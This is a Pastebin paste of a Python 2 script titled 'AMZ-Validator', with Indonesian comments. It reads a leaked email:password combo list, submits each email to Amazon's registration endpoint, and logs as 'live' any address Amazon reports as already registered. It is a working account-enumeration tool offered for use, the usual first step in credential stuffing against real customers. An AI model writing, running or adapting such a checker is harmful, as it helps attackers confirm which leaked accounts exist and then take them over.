RHDyarAP

Untitled

Jan 31st, 2019
191
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.37 KB | None | 0 0
  1. import requests
  2. import time
  3. # Jangan Di Recode Ya Bossku
  4. # Tinggal  Make Aja Apa Susahnya Sih :)
  5. # options output live dan die
  6.  
  7. live = open('Live.txt','w')
  8. die = open('Die.txt','w')
  9. print("-"*55)
  10. print("                       RH DYAR AP                        ")
  11. print("-"*55)
  12. list = raw_input("\033[33;1mEmpas : \033[0m")
  13. print("Please Wait...........")
  14. time.sleep(1)
  15. link = "https://www.amazon.com/ap/register%3Fopenid.assoc_handle%3Dsmallparts_amazon%26openid.identity%3Dhttp%253A%252F%252Fspecs.openid.net%252Fauth%252F2.0%252Fidentifier_select%26openid.ns%3Dhttp%253A%252F%252Fspecs.openid.net%252Fauth%252F2.0%26openid.claimed_id%3Dhttp%253A%252F%252Fspecs.openid.net%252Fauth%252F2.0%252Fidentifier_select%26openid.return_to%3Dhttps%253A%252F%252Fwww.smallparts.com%252Fsignin%26marketPlaceId%3DA2YBZOQLHY23UT%26clientContext%3D187-1331220-8510307%26pageId%3Dauthportal_register%26openid.mode%3Dcheckid_setup%26siteState%3DfinalReturnToUrl%253Dhttps%25253A%25252F%25252Fwww.smallparts.com%25252Fcontactus%25252F187-1331220-8510307%25253FappAction%25253DContactUsLanding%252526pf_rd_m%25253DA2LPUKX2E7NPQV%252526appActionToken%25253DlptkeUQfbhoOU3v4ShyMQLid53Yj3D%252526ie%25253DUTF8%252Cregist%253Dtrue"
  16. head = {'User-agent':'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30'}
  17. s = requests.session()
  18. g = s.get(link, headers=head)
  19. list = open(list, 'r')
  20. while True:
  21.     email = list.readline().replace('\n','')
  22.     if not email:
  23.         break
  24.     pisah = email.split(':')
  25.     xxx = {'customerName':'kepalabotak','email': pisah[0],'password':'memek1236','passwordCheck':'memek1236'}
  26.     cek = s.post(link, headers=head, data=xxx).text
  27.     if "You indicated you are a new customer, but an account already exists with the e-mail" in cek:
  28.         print("\033[32;1mLIVE | "+pisah[0]+" | \033[0m[ \033[36;5mAMZ-Validator\033[0m ]")
  29.         live.write(pisah[0]+'\n') # UNTUK WINDOW FUNAKAN /r/n   | jika ingin menyimpan hasil beserta passnya gunakan email+
  30.     else:
  31.         print("\033[31;1mDIE | "+pisah[0]+" | \033[0m[ \033[36;5mAMZ-Validator\033[0m ]")
  32.         die.write(pisah[0]+'\n') # UNTUK WINDOW FUNAKAN /r/n    | jika ingin menyimpan hasil beserta passnya gunakan email+
  33. print("-"*55)
  34. print("\033[35;1mProccess Check Selesai !\033[0m")
  35. print("Valid Email Saved In : Live.txt\nDie Email Saved In : Die.txt")
Advertisement
Add Comment
Please, Sign In to add comment